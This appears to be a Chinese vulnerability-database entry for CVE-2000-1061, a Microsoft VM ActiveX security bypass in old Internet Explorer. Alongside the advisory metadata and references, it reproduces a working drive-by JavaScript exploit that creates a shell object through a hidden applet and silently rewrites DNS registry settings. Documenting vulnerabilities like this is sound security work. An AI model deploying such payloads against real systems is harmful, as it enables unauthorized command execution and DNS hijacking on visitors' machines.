Internet Explorer Microsoft Virtual Machine (VM)安全设置绕过和命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106027 漏洞类型 未知
发布时间 2000-10-05 更新时间 2005-10-12
CVE编号 CVE-2000-1061 CNNVD-ID CNNVD-200012-010
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/20266
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-010
|漏洞详情
InternetExplorer4.x和5.x版本的MicrosoftVirtualMachine(VM)中的无符号程序可以创建和使用ActiveX控件,远程攻击者可以借助畸形web页面或邮件绕过InternetExplorer安全设置,并执行任意命令,该漏洞也称为“MicrosoftVMActiveXComponent”漏洞。
|漏洞EXP
source: http://www.securityfocus.com/bid/1754/info

If a malicious website operator were to embed a specially crafted java object into a HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent java object inserted into an <APPLET> tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards.

Even if Outlook has had the 'security update' applied, it is still possible to circumvent the disabling of active script execution through the use of java.

Execution of arbitrary programs could make it possible for the malicious website operator to gain rights equivalent to those of the current user. 

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-89400-0A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>
|参考资料

来源:MS
名称:MS00-075
链接:http://www.microsoft.com/technet/security/bulletin/MS00-075.asp
来源:XF
名称:java-vm-applet
链接:http://xforce.iss.net/static/5127.php